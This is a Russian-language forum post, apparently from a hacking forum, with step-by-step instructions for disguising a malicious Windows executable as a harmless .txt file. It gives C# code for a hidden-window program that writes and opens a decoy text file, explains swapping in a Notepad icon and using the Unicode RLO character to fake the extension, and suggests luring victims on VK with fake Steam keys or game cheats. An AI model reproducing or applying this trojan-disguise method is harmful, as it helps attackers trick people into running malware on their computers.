Обычный .txt файл ни у кого не вызывает подозрения. И так совпало что вирус можно замаскировать под него, да так чтобы он реально работал как .txt. Это идеальный вариант для маскировки *******ов. Сразу к минусам: если человек использует вид Таблица в папках, то там черным по белому написано Приложение. Можно открыть Свойства файла и встретить такую же картину. Избавиться от этих минусов может только невнимательность человека или распаковка вируса на рабочий стол. Принцип работы: закидываем в архивчик наш замаскированный вирус (если хотите распространять по VK - так как .exe он не даёт загрузить), подписываем наш .exe как: "ключи steam", "чит коды на варфейс" и тому подобное. Меняем иконку на иконку блокнота. Жертва скачав архив открывает наш *******, он в свою очередь создаёт где-нибудь файл заодно наполняя его текстом и потом открывая. В случае с примером "ключи steam" можно закинуть реальные ключи, но уже использованные - подозрений что на ПК ******* ноль. Кодинг и полный принцип работы: 1. Создаём новое решение Windows Form. 2. Открываем код Form1.cs: using System; using System.IO; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Diagnostics; // Process.Start namespace realItLolz { public partial class Form1 : Form { public Form1() { InitializeComponent(); string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); string pathToTxt = Path.Combine(localappdata, "system.txt"); var writeTxt = new StreamWriter(File.OpenWrite(pathToTxt)); // создаём .txt файл writeTxt.WriteLine("Статья от stesyel"); // добавляем строчку writeTxt.WriteLine("._."); writeTxt.Close(); // закрываем файл после завершенния работы Process.Start("notepad.exe", pathToTxt); // открываем .txt с помощью блокнота } } } Код using System; using System.IO; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Diagnostics; // Process.Start namespace realItLolz { public partial class Form1 : Form { public Form1() { InitializeComponent(); string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); string pathToTxt = Path.Combine(localappdata, "system.txt"); var writeTxt = new StreamWriter(File.OpenWrite(pathToTxt)); // создаём .txt файл writeTxt.WriteLine("Статья от stesyel"); // добавляем строчку writeTxt.WriteLine("._."); writeTxt.Close(); // закрываем файл после завершенния работы Process.Start("notepad.exe", pathToTxt); // открываем .txt с помощью блокнота } } } Проверяем.. И да! Это работает. 3. Теперь нужно скрыть приложение, вставляем это код в Form1.cs перед InitializeComponent(): FormBorderStyle = FormBorderStyle.None; WindowState = FormWindowState.Minimized; Height = 0; Width = 0; ShowIcon = false; ShowInTaskbar = false; Код FormBorderStyle = FormBorderStyle.None; WindowState = FormWindowState.Minimized; Height = 0; Width = 0; ShowIcon = false; ShowInTaskbar = false; Как бы и не видно ничего, просто открылся .txt :] 4. Настало время сменить иконку и расширение: Изменять иконку будем с помощью Resource Hacker. Я буду получать её из shell32.dll, делается это так: - Переносим shell32.dll в Resource Hacker. - Находим Icon Group и доходим до 152 номера. - Кликаем правой кнопкой мыши выбираем Save *.ico resource.. Теперь закидываем наш .exe и жмём на Add Binary or Image Resource, выбираем нашу .ICO-нку. Resource Name должно быть равно ICON. Сохраняем файл. 4.2. Требуется чтобы перед .exe было написано txt! Так же всё что мы повторили можно отобразить в изображение, видео и т.д. Ставим ввод (мигающая полоска с которой начинает писаться текст) перед txt.exe далее Вставить управляющий символ Юникода ---> RLO. Полный код using System; using System.IO; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Diagnostics; // Process.Start namespace realItLolz { public partial class Form1 : Form { public Form1() { InitializeComponent(); FormBorderStyle = FormBorderStyle.None; WindowState = FormWindowState.Minimized; Height = 0; Width = 0; ShowIcon = false; ShowInTaskbar = false; string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); string pathToTxt = Path.Combine(localappdata, "system.txt"); var writeTxt = new StreamWriter(File.OpenWrite(pathToTxt)); // создаём .txt файл writeTxt.WriteLine("Статья от stesyel"); // добавляем строчку writeTxt.WriteLine("._."); writeTxt.Close(); // закрываем файл после завершенния работы Process.Start("notepad.exe", pathToTxt); // открываем .txt с помощью блокнота } } } Код using System; using System.IO; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.Linq; using System.Text; using System.Threading.Tasks; using System.Windows.Forms; using System.Diagnostics; // Process.Start namespace realItLolz { public partial class Form1 : Form { public Form1() { InitializeComponent(); FormBorderStyle = FormBorderStyle.None; WindowState = FormWindowState.Minimized; Height = 0; Width = 0; ShowIcon = false; ShowInTaskbar = false; string localappdata = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData); string pathToTxt = Path.Combine(localappdata, "system.txt"); var writeTxt = new StreamWriter(File.OpenWrite(pathToTxt)); // создаём .txt файл writeTxt.WriteLine("Статья от stesyel"); // добавляем строчку writeTxt.WriteLine("._."); writeTxt.Close(); // закрываем файл после завершенния работы Process.Start("notepad.exe", pathToTxt); // открываем .txt с помощью блокнота } } } Псс.. На этом всё, спасибо за прочтение.
ZONA_inactive2536790, можно код переписать под C++, даже никаких зависимостей не будет. В вообщем затупил: оказывается бывает склейка .txt + .exe